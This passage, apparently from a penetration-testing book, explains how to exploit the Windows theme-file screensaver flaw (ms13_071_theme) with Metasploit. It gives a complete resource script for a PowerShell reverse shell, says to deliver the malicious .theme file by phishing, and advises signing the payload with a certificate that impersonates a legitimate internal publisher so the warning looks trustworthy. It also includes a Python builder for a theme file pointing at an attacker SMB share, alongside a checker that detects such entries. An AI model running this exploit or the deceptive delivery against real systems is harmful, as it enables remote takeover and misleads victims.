Single targets using a reverse shell with a PowerShell attack vector

In this section, we will take an example of a similar exploitation. This time, the vulnerability lies in how Windows handles the screensaver path in a theme file: the [boot] section of a .theme file names the screensaver executable, and an arbitrary path, including a remote SMB share, is accepted. This gives the attacker remote code execution. If the victim steps away from the computer and a screensaver is set to run, Windows launches the screensaver each time the idle timeout elapses, so the same exploit is run every time it kicks in.

We will be using ms13_071_theme, which Microsoft's bulletin lists as affecting only Windows XP and Windows Server 2003; in our testing, however, it still works on Windows 7 and Windows Server 2008. Now let's equip Metasploit with the required settings, such as the payload, LHOST, and LPORT, so that it is ready to exploit, as shown in the following screenshot:

In this exploit, we will use the PowerShell attack vector for the reverse shell, so the payload is windows/powershell_reverse_tcp.
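An msfconsole resource script that performs the setup described above, as an added example rather than the book's own screenshot; the addresses are placeholders, and the option names FILENAME and SRVHOST are those the module exposes at the time of writing, so confirm them with show options before relying on them:

```text
use exploit/windows/fileformat/ms13_071_theme
set FILENAME update.theme
set SRVHOST 192.0.2.10
set PAYLOAD windows/powershell_reverse_tcp
set LHOST 192.0.2.10
set LPORT 4444
exploit -j
```

Save it as ms13_071.rc and run msfconsole -r ms13_071.rc. The module starts an SMB server on SRVHOST to serve the screensaver, writes the .theme file under ~/.msf4/local/, and the PowerShell handler waits on LHOST:LPORT; the theme file is what you deliver to the victim.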

The next step is to have the victim open the theme file, which makes Windows fetch the screensaver from the attacker's SMB share; the file can be delivered through phishing or other social engineering techniques. Once the victim opens it, some users may be alerted by a security warning, as shown in the following screenshot:

So, for penetration testers, it is recommended to sign the .scr files with a certificate that appears to belong to a legitimate internal user or publisher, so that the warning looks trustworthy. The next step occurs when the user clicks on Run; that's it. This opens a reverse shell to the attacker with PowerShell, which allows the attacker to run PowerShell commands on the victim system in that user's context and use the foothold to escalate privileges toward the domain, as shown in the following screenshot.
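As an added example, not code from the book or from the Metasploit module: a small Python script that builds a .theme file whose [boot] SCRNSAVE.EXE entry points at a UNC share, which is the condition ms13_071_theme relies on, and, for the defensive side, a checker that flags such entries so a blue team can scan theme files before they reach users. The share address, host and file names are constructed for the example.

```python
"""Build a .theme file whose screensaver entry points at an SMB share,
and check theme files for that condition.

Added example: not the Metasploit module's code. The share, host and
file names below are constructed for illustration."""
import configparser
from io import StringIO

# Constructed attacker share; on an engagement this is the SMB server
# (the exploit module's, or your own) that serves the .scr payload.
ATTACKER_SCR = r"\\192.0.2.10\share\update.scr"


def build_theme(scr_path: str, display_name: str = "Corporate") -> str:
    """Return a minimal .theme file (INI text, CRLF line endings).

    The [boot] section's SCRNSAVE.EXE key names the screensaver Windows
    launches after the idle timeout. On unpatched Windows XP / 2003 the
    value is not restricted to a local path, so a UNC path makes the
    system fetch and execute the .scr from the remote share.
    """
    return (
        "[Theme]\r\n"
        f"DisplayName={display_name}\r\n"
        "\r\n"
        "[boot]\r\n"
        f"SCRNSAVE.EXE={scr_path}\r\n"
    )


def is_remote_path(path: str) -> bool:
    r"""True if a Windows path refers to a network location.

    Handles the plain \\server\share form, the forward-slash form, and
    the extended-length \\?\UNC\server\share form; \\?\C:\... and
    \\.\ device paths are treated as local.
    """
    p = path.strip().strip('"')
    low = p.lower()
    if low.startswith("\\\\?\\"):
        return low[4:].startswith("unc\\")
    if low.startswith("\\\\.\\"):
        return False
    return (p.startswith("\\\\") or p.startswith("//")) and len(p) > 2


def find_remote_screensaver(theme_text: str):
    """Parse .theme text and return the SCRNSAVE.EXE value if it points
    at a remote share, else None.

    RawConfigParser is used so '%' in paths is not interpolated, and
    strict=False because real theme files repeat keys and sections.
    """
    cp = configparser.RawConfigParser(strict=False)
    cp.read_file(StringIO(theme_text))
    for section in cp.sections():
        if section.lower() != "boot":
            continue
        for key, value in cp.items(section):
            # configparser lower-cases option names by default
            if key == "scrnsave.exe" and is_remote_path(value):
                return value.strip().strip('"')
    return None


def scan_theme_file(path: str):
    """Read a .theme file from disk (cp1252 is what Windows writes) and
    return its remote screensaver entry, or None if there is none."""
    with open(path, encoding="cp1252", errors="replace") as fh:
        return find_remote_screensaver(fh.read())


if __name__ == "__main__":
    theme = build_theme(ATTACKER_SCR)
    print(theme)
    print("remote screensaver:", find_remote_screensaver(theme))
```

The checker deliberately matches the section and key case-insensitively and strips surrounding quotes, because Windows accepts all of those spellings; a scanner that only looks for the exact string SCRNSAVE.EXE=\\ would miss a trivially obfuscated theme.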
